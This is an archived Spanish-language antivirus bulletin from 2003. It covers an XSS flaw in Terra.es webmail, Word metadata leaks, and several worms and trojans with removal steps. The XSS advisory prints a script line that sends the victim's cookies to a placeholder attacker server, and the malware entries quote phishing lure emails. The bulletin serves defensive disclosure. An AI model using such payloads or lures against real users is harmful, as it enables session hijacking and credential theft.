Mostrando mensaje 155     < Anterior | Siguiente > Responder a este mensaje Asunto: VSantivirus No. 1106 Año 7, Viernes 18 de julio de 2003 Fecha: Viernes, 18 de Julio, 2003  03:35:01 (-0300) Autor: VSAntivirus.com <vsantivirus @...........com> VSantivirus No. 1106 Año 7, Viernes 18 de julio de 2003 _____________________________________________________________ El boletín diario de VSANTIVIRUS - http://www.vsantivirus.com VIDEO SOFT (Maldonado, Uruguay) - http://www.videosoft.net.uy _____________________________________________________________ 1 - Vulnerabilidad XSS en el Webmail de Terra.es 2 - Microsoft Word pone en ridículo al gobierno británico 3 - W32/Gruel.B. Destructivo gusano que obliga a reinstalar 4 - W32/Gruel.C. Destructivo gusano que obliga a reinstalar 5 - JS/StartPage.C. Cambia páginas de inicio y de búsqueda 6 - Troj/Backdoor.Webber.A. La PC infectada puede enviar spam _____________________________________________________________ 1 - Vulnerabilidad XSS en el Webmail de Terra.es _____________________________________________________________ http://www.vsantivirus.com/vul-webmail-terra.htm Vulnerabilidad Cross Site Scripting en el Webmail de Terra.es Por Odree odree@mail.com * Descripción: El problema reside en la gestión de ficheros adjuntos de tipo .html o .htm Cuando se envía un email en formato HTML a un usuario de Terra.es, el sistema filtra cualquier tipo de código dañino. Sin embargo, cuando un usuario recibe un fichero HTML adjunto, el webmail permite abrirlo, dentro del dominio de Terra, sin verificar que este fichero no contiene código malicioso. De esta forma, un atacante podría enviar un fichero HTML adjunto a un usuario, con código malicioso, Si el fichero adjunto contiene un código parecido al siguiente, el atacante tendría datos suficientes como para robar la sesión: <SCRIPT>document.location.href='www.servidoratacante.com/scri ptatacante.php' + document.location.search + '?cookie=' + document.cookie</SCRIPT> Bastaría programar un pequeño script que automáticamente hiciera las acciones que el atacante deseara. * Alcance de la vulnerabilidad: Esta vulnerabilidad permite robar la sesión al usuario, con lo que se podría efectuar cualquier acción que pudiera hacer el usuario. * Solución: De momento no existe solución a esta vulnerabilidad. Como precaución, no debe abrirse ningún fichero HTML adjunto. * Acerca del autor: Esta vulnerabilidad ha sido descubierta por Odree (odree@mail.com). El autor declina cualquier responsabilidad del uso de la información expresada en este documento. En estos momentos Odree se encuentra buscando trabajo como consultor de seguridad en cualquier parte del mundo. Si está interesado, contacte en odree@mail.com (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 2 - Microsoft Word pone en ridículo al gobierno británico _____________________________________________________________ http://www.vsantivirus.com/mm-word-blair.htm Microsoft Word pone en ridículo al gobierno británico Por Mercè Molist (*) colaboradores@videosoft.net.uy El gobierno británico acaba de descubrir, en sus propias carnes, una característica poco conocida del editor de textos Microsoft Word: los metadatos ocultos. Esta información, que se graba automáticamente en el documento pero queda escondida a los ojos del usuario, revela el nombre del autor, en qué directorio lo ha guardado o qué impresora ha utilizado. Ahora se ha dado a conocer que, en febrero, el gobierno Blair publicó en su web un 'dossier' sobre Iraq, escrito en Word, sin saber que los metadatos ocultos revelaban los nombres de quienes revisaron el texto antes de su divulgación. Los documentos escritos con Microsoft Word, bajo la extensión .doc, tienen una característica que algunos expertos han denunciado como un problema de privacidad y que la compañía explica en su web: "Cuando se crea, abre o guarda un documento, se le añade información llamada "metadatos". Algunos son accesibles desde Microsoft Word y otros sólo se ven si se abre el documento desde otro editor de texto. Como ejemplos de "metadatos", el nombre del autor y autores previos, su compañía u organización, nombre del ordenador, del disco duro y la red, revisiones del texto, etc.". Algunos virus, específicos para Word, pueden hacer que se guarde información más confidencial, como datos financieros o enlaces almacenados en el navegador, sin que el usuario lo advierta. Para visualizarlos, basta abrir el .doc con el Bloc de Notas, un editor de textos para GNU/Linux o, como hizo Richard M. Smith, un pequeño programa hecho a mano: "En febrero de este año, el gobierno publicó un 'dossier' sobre la seguridad en Iraq, que citó Colin Powell en las Naciones Unidas. Un lector de la Universidad de Cambridge descubrió que era un plagio de un investigador norteamericano. Cuando lo supe, decidí bajarme el texto y examinarlo". Sabedor de que Microsoft Word muestra, como metadatos escondidos, los últimos diez nombres que han revisado el documento, lo abrió con su programa casero y allí estaba la grabación de los pasos dados por el texto dentro del gobierno. Aparecían tres entradas provenientes del Communications Information Centre y cuatro nombres propios, que correspondían a un oficial del Foreign Office, otro de Downing Street, un oficial de prensa y la asistente personal del secretario de prensa del Primer Ministro. Aunque Smith hizo su descubrimiento en febrero, hasta ahora no lo ha publicado, cuando el gobierno ya ha retirado el archivo. Y añade: "Una de las anécdotas más interesantes es que John Pratt, el oficial de Downing Street, copió el 'dossier' en un disquete, que la asistente de prensa dio a Colin Powell. Efectivamente, los datos grabados muestran que el documento es copiado del ordenador de Pratt a un disquete, en los pasos 4 y 5. El gobierno Blair ha aprendido bien la lección: otro documento sobre Iraq, que publicaron en junio, sólo está disponible en formado .pdf". * Referencias: Microsoft Word bytes Tony Blair in the butt http://www.computerbytesman.com/privacy/blair.htm How to Minimize Metadata in Microsoft Word Documents http://support.microsoft.com:80/support/kb/articles/Q223/7/90.ASP (*) Copyright (C) 2003 Mercè Molist. Verbatim copying, translation and distribution of this entire article is permitted in any medium, provided this notice is preserved. (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 3 - W32/Gruel.B. Destructivo gusano que obliga a reinstalar _____________________________________________________________ http://www.vsantivirus.com/gruel-b.htm Nombre: W32/Gruel.B Tipo: Gusano de Internet Alias: W32/Gruel-B, W32/Fakerr.b@MM, W32.Gruel.b@MM, W32.Gruel@mm, Win32.Gruel, Win32/Gruel.B Plataforma: Windows 32-bit Tamaño: 102,400 bytes Fecha: 17/jul/03 Este gusano, se envía masivamente a través del correo electrónico, disfrazado como una herramienta de Symantec, para remover al propio virus: Asunto: Symantec: New serious virus found Datos adjuntos: Symantec_Norton_Tool.exeTexto: Norton Security Response: has detected a new virus in the Internet. For this reason we made this tool attachement, to protect your computer from this serious virus. Due to the number of submissions received from customers, Symantec Security Response has upgraded this threat to a Category 5 (Maximum ). Prevention, using the W32.Gruel@mm Tool: To prevent or remove W32.W32.Gruel@mm , apply this attachment tool as quickly as possible. This is the easiest way to remove/prevent this threat. Technical Details: Also Known As: W32.Gruel@mm , W32.KillerGuate Type: Virus Infection Length: 45,195 bytes (zip file), 45,528 bytes (executable) (45KB approx) Systems Affected: Windows 95, Windows 98, Windows NT, Windows 2000, Windows XP, Windows Me, Windows 2003 Systems Not Affected: Macintosh, OS/2, UNIX, Linux Additional information: Security Response has received many submissions of corrupted W32.W32.Gruel@mm . A specific detection for this type of infected file has been added as W32.W32.Gruel@mm . This detection is available in virus definitions dated June 12 2003. Be sure to delete the files detected as W32.W32.Gruel@mm . Note: If you believe your computer may already be infected or just want to protect it agains W32.W32.Gruel@mm , please download this tool now. Symantec Corporation. Last Updated on: July 13, 2003 04:55:35 PM Note que simula ser una cura para el propio virus, el cuál en realidad es el adjunto (recuerde que jamás recibirá un archivo no solicitado de ninguna compañía, y menos de una dedicada a fabricar antivirus). * Más información: W32/Gruel.A. Falsos mensajes de Microsoft y Symantec http://www.vsantivirus.com/gruel-a.htm (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 4 - W32/Gruel.C. Destructivo gusano que obliga a reinstalar _____________________________________________________________ http://www.vsantivirus.com/gruel-c.htm Nombre: W32/Gruel.C Tipo: Gusano de Internet Alias: W32/Gruel-C, W32/Fakerr.c@MM, W32.Gruel.c@MM, W32.Gruel@mm, Win32.Gruel, Win32/Gruel.C Plataforma: Windows 32-bit Tamaño: 102,400 bytes Fecha: 17/jul/03 Este gusano, de envío masivo a través del correo electrónico, se disfraza como una actualización de Windows enviada por Microsoft en un mensaje igual a la versión A. Asunto: Microsoft Windows Critical Update. Datos adjuntos: Windows Critical Update 088562.exe Texto: Critical Update: The Microsoft Windows updates found on this patch include fixes to following Windows operating systems: Any update that is critical to the operation of your computer is considered a Critical Update, and is automatically selected for installation during the scan for available updates. This patch is provided to help resolve known issues, and to protect your computer from known security vulnerabilities and all kinds of viruses. Whether a patch applies to your operating system, software programs, or hardware, it is listed in the Critical Updates category, like this patch attached. For Support please contact us at support@microsoft.com. * Más información: W32/Gruel.A. Falsos mensajes de Microsoft y Symantec http://www.vsantivirus.com/gruel-a.htm (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 5 - JS/StartPage.C. Cambia páginas de inicio y de búsqueda _____________________________________________________________ http://www.vsantivirus.com/startpage-c.htm Nombre: JS/StartPage.C Tipo: Caballo de Troya en JavaScript Alias: Win32.Startpage.C, JS.CSSPopup.B, JScript/IEstart.Trojan, Win32/IEstart.Trojan, JS/StartPage.dr, Win32/StartPage.K, Win32/StartPage.L, TrojanDropper.JS.Mimail Plataforma: Windows 32-bit Fecha: 17/jul/03 Este troyano cambia las páginas de inicio y de búsqueda del usuario infectado en el Internet Explorer. Para ello realiza las siguientes modificaciones en el registro donde [dirección del sitio] puede ser cualquier página web, en este caso "coolwwwsearch.com". HKCU\Software\Microsoft\Internet Explorer\Main Default_Page_URL = [dirección del sitio] Default_Search_URL = [dirección del sitio] HOMEOldSP = [dirección del sitio] Search Bar = [dirección del sitio] Search Page = [dirección del sitio] Start Page = [dirección del sitio] HKCU\Software\Microsoft\Internet Explorer\Search CustomizeSearch = [dirección del sitio] SearchAssistant = [dirección del sitio] SearchURL = [dirección del sitio] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion \InternetSettings\SafeSites [dirección del sitio] También agrega ese valor en las siguientes entradas: HKCU\Software\Microsoft\Internet Explorer HKCU\Software\Microsoft\Internet Explorer\Styles HKLM\SOFTWARE\Microsoft\Internet Explorer HKLM\SOFTWARE\Microsoft\Internet Explorer\Main HKLM\SOFTWARE\Microsoft\Internet Explorer\Search HKLM\SOFTWARE\Microsoft\Internet Explorer\Styles El gusano también modifica el archivo HOSTS. HOSTS es un archivo en formato texto, sin extensión, ubicado en windows\hosts o windows\system32\drivers\etc\hosts, dependiendo de la versión de Windows. Dicho archivo es usado por el sistema operativo para asociar nombres de dominio con direcciones IP. Si este archivo existe, el sistema lo examina antes de hacer una consulta a un servidor DNS. El gusano redirige las direcciones IP de la página de búsqueda de MSN (MSN Search), al IP del sitio web mencionado antes. Cada vez que se intente acceder a MSN Search, se accede al sitio ya visto. También crea este archivo: c:\windows\Default.CSS De este modo, se agrega una hoja de estilo por defecto para dar formato a todas las páginas Web que se muestren, y puede ser accedida desde Herramientas, Opciones de Internet, lengüeta "General", botón "Accesibilidad", "Hoja de estilo del usuario". Esta hoja de estilo tiene enlaces al sitio web mencionado. La ubicación y el nombre de la carpeta "System" de Windows varía según la versión del Sistema Operativo instalado: Windows 2000 y NT: C:\Winnt\System32 Windows 95, 98 y Me: C:\Windows\System Windows XP: C:\Windows\System32 La ubicación de la carpeta de instalación por defecto para el directorio "Windows": Windows 2000 y NT: C:\Winnt Windows 95, 98, Me y XP: C:\Windows * Reparación manual * Antivirus 1. Actualice sus antivirus con las últimas definiciones 2. Ejecútelos en modo escaneo, revisando todos sus discos 3. Borre los archivos detectados como infectados * Editar el registro 1. Ejecute el editor de registro: Inicio, ejecutar, escriba REGEDIT y pulse ENTER 2. En el panel izquierdo del editor, pinche en el signo "+" hasta abrir la siguiente rama: HKEY_CURRENT_USER \Software \Microsoft \Internet Explorer \Main 3. Pinche en la carpeta "Main" y en el panel de la derecha, bajo la columna "Nombre", busque y borre el sitio "coolwwwsearch.com" de las siguientes entradas: Default_Page_URL Default_Search_URL HOMEOldSP Search Bar Search Page Start Page 4. En el panel izquierdo del editor, pinche en el signo "+" hasta abrir la siguiente rama: HKEY_CURRENT_USER \Software \Microsoft \Internet Explorer \Search 5. Pinche en la carpeta "Search" y en el panel de la derecha, bajo la columna "Nombre", busque y borre el sitio "coolwwwsearch.com" de las siguientes entradas: CustomizeSearch SearchAssistant SearchURL 6. Reitere los pasos 4 y 5 con las siguientes entradas del registro, buscando y borrando el sitio "coolwwwsearch.com": HKEY_CURRENT_USER\Software\Microsoft \Internet Explorer HKEY_CURRENT_USER\Software\Microsoft \Internet Explorer\Styles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Internet Explorer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Internet Explorer\Main HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Internet Explorer\Search HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Internet Explorer\Styles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\InternetSettings\SafeSites 7. Use "Registro", "Salir" para salir del editor y confirmar los cambios. 8. Reinicie su computadora (Inicio, Apagar el sistema, Reiniciar). * Información adicional * Borrar Archivos temporales de Internet. 1. Vaya al Panel de control, Opciones de Internet, General 2. En Archivos temporales de Internet pinche en "Eliminar archivos" 3. Marque la opción "Eliminar todo el contenido sin conexión" 4. Pinche en Aceptar, etc. * Procedimiento para restaurar página de inicio y página de búsqueda en Internet Explorer 1. Cierre todas las ventanas del Internet Explorer abiertas 2. Seleccione "Mi PC", "Panel de control". 3. Pinche en el icono "Opciones de Internet". 4. Seleccione la lengüeta "Programas". 5. Pinche en el botón "Restablecer configuración Web" 6. Asegúrese de tener tildada la opción "Restablecer también la página inicio" y seleccione el botón SI. 7. Pinche en "Aceptar". * Eliminar "Hoja de estilo del usuario" 1. Cierre todas las ventanas del Internet Explorer abiertas. 2. Seleccione "Mi PC", "Panel de control". 3. Pinche en el icono "Opciones de Internet". 4. Seleccione la lengüeta "General", botón "Accesibilidad". 5. En "Hoja de estilo del usuario", destilde "Dar formato a los documentos utilizando mi hoja de estilo". 6. Pinche en "Aceptar" * Mostrar las extensiones verdaderas de los archivos Para poder ver las extensiones verdaderas de los archivos y además visualizar aquellos con atributos de "Oculto", proceda así: 1. Ejecute el Explorador de Windows 2. Seleccione el menú "Ver" (Windows 95/98/NT) o el menú "Herramientas" (Windows Me/2000/XP), y pinche en "Opciones" u "Opciones de carpetas". 3. Seleccione la lengüeta "Ver". 4. DESMARQUE la opción "Ocultar extensiones para los tipos de archivos conocidos" o similar. 5. En Windows 95/NT, MARQUE la opción "Mostrar todos los archivos y carpetas ocultos" o similar. En Windows 98, bajo "Archivos ocultos", MARQUE "Mostrar todos los archivos". En Windows Me/2000/XP, en "Archivos y carpetas ocultos", MARQUE "Mostrar todos los archivos y carpetas ocultos" y DESMARQUE "Ocultar archivos protegidos del sistema operativo". 6. Pinche en "Aplicar" y en "Aceptar". * Limpieza de virus en Windows Me y XP Si el sistema operativo instalado es Windows Me o Windows XP, para poder eliminar correctamente este virus de su computadora, deberá deshabilitar antes de cualquier acción, la herramienta "Restaurar sistema" como se indica en estos artículos: Limpieza de virus en Windows Me http://www.vsantivirus.com/faq-winme.htm Limpieza de virus en Windows XP http://www.vsantivirus.com/faq-winxp.htm (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 6 - Troj/Backdoor.Webber.A. La PC infectada puede enviar spam _____________________________________________________________ http://www.vsantivirus.com/back-webber-a.htm Nombre: Troj/Backdoor.Webber.A Tipo: Caballo de Troya Alias: Backdoor.Berbew, Troj/Webber-A, BackDoor-AXJ, TrojanProxy.Win32.Webber.10, Win32/Webber.10, Win32/Webber.A, Troj/Webber.A, TrojanProxy.Win32.Webber, W32/Heloc-mm Fecha: 16/jul/03 Puertos: 7714 y 8546 (pueden modificarse) Tamaños: 39,140 bytes, 5,633 bytes Plataforma: Windows 32-bit Una nueva variante de este gusano ha sido reportada por F- Secure. Utiliza un mensaje con las siguientes características: Asunto: Re: Your E-Loan Refinance Application Datos adjuntos: E-Loan-Appraiser-Results.pif Texto: Dear sir, Thank you for your recent online Refinance Application with E-Loan Inc. Apparently you have moved from your current home address a couple of months ago, so we coulnd't verify your identity with Credit Bureaus and Chexsystems. We are sorry for any inconvenience. Attached are scanned copies of your Home Value, Grant Deeds and your current Credit Profile from 3 major Credit Bureaus. Take a close look at it, as you will receive hard copies by usps mail in few days. Troyano que roba información confidencial de la computadora infectada, así como datos de cuentas bancarias, capturando todo lo tecleado por el usuario al acceder a bancos on-line. También puede descargar otros componentes de Internet, además de enviar la dirección IP de la máquina infectada a otros equipos, actuando como Proxy de hasta 100 conexiones simultáneas. Esto puede ser usado para que un usuario remoto utilice la máquina infectada como "lanzadera" de cualquier clase de datos, por ejemplo SPAM. Más información: Troj/Backdoor.Webber.A. La PC infectada puede enviar spam http://www.vsantivirus.com/back-webber-a.htm (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ Pautas generales para mantenerse alejado de los virus _____________________________________________________________ Recuerde estas pautas para mantener alejado de su computadora cualquier riesgo de virus o troyanos: 1) Use regularmente un programa antivirus (nosotros siempre recomendamos no confiar en uno solo, pero usar más de uno no significa que debamos tenerlos a todos instalados, simplemente ejecutamos esos antivirus en su opción de escaneo, sobre la carpeta que contenga los archivos a revisar). Y por supuesto, de nada vale usar algún antivirus si no lo mantenemos actualizado con los upgrades, updates o add-ons correspondientes. Actualmente, las actualizaciones son diarias (AVP, Panda y otros) o al menos semanales. No existen los "virus demasiados nuevos y sin antídotos", la reacción de las casas de antivirus es inmediata en todos los casos. Pero mejor pregúntese, si la suya también lo es a la hora de actualizarse. 2) No abrir ningún mensaje ni archivo recibido a través del correo electrónico de fuentes desconocidas o muy poco conocidas. En el caso de personas conocidas, se deben igualmente tomar las precauciones correspondientes. Asegurarse con esa persona del envío ("Melissa" y otros pueden ser enviados por conocidos que ignoran estar mandando el virus en sus mensajes), y nunca ejecutarlos, sino guardarlos en una carpeta temporal y pasarle a esa carpeta dos o tres antivirus actualizados antes de tomar la opción de ejecutarlos (.EXE) o abrirlos (.DOC, .RTF, etc.). Pero ante cualquier duda, simplemente se debe optar por borrar el mensaje (y archivos adjuntos). Como se dice vulgarmente, "la confianza mata al hombre", en este caso a la PC. 3) Estar informado de cómo operan los virus, y de las novedades sobre estos, alertas y anuncios críticos, en sitios como el nuestro. 4) No bajar nada de sitios Web de los que no tenga referencias de seriedad, o que no sean medianamente conocidos. Y si se bajan archivos, proceder como los archivos adjuntos. Copiarlos a una carpeta y revisarlos con dos o tres antivirus actualizados antes de optar por ejecutarlos o abrirlos. _____________________________________________________________ Sobre este boletín _____________________________________________________________ La distribución de este boletín es gratuita, y está amparada bajo los derechos de Copyright registrados por Video Soft (también los artículos publicados directamente en nuestra página). Si usted desea usar esta información en cualquier medio escrito o electrónico, puede hacerlo sin solicitarnos el permiso respectivo, con la única condición de mencionar su origen, y remitirnos un e-mail o ejemplar con la ubicación donde se haga referencia al material usado que haya sido sacado de este boletín o de la página de VSAntivirus. Video Soft, Video Soft BBS, VSAntivirus y VSAyuda son marcas registradas. Los artículos de otros autores han sido incluidos de acuerdo a la política de Copyright adoptada por cada uno de ellos, y su inclusión en nuestro boletín se rige por dichas políticas, sin embargo, para su uso en otro medio, se deberá solicitar la debida autorización.- _____________________________________________________________ Visite diariamente nuestra página. Puede bajar de allí las versiones de evaluación actualizadas de los antivirus más usados o que consideramos por nuestra experiencia más confiables. No mantenemos ninguna relación comercial con ninguna empresa productora de antivirus. El criterio de selección solo pasa por nuestra experiencia diaria con usuarios y clientes, a los que asesoramos y damos servicio técnico. _____________________________________________________________ Cualquier duda o comentario sobre esta lista de correo, envíe un e-mail a cualquiera de estas direcciones: jllopez@nativo.com videosoft@videosoft.net.uy _____________________________________________________________ VSANTIVIRUS - Sitio oficial: http://www.vsantivirus.com _____________________________________________________________ Altas: http://listas.vsantivirus.com/lista/vsantivirus/alta Bajas: http://listas.vsantivirus.com/lista/vsantivirus/baja También puede enviar un mensaje vacío a estas direcciones: Altas: vsantivirus-alta@listas.vsantivirus.com Bajas: vsantivirus-baja@listas.vsantivirus.com _____________________________________________________________ VSANTIVIRUS - http://www.vsantivirus.com - Es un servicio de VIDEO SOFT (Maldonado, Uruguay) - http://www.videosoft.net.uy _____________________________________________________________ VSantivirus No. 1106 Año 7, Viernes 18 de julio de 2003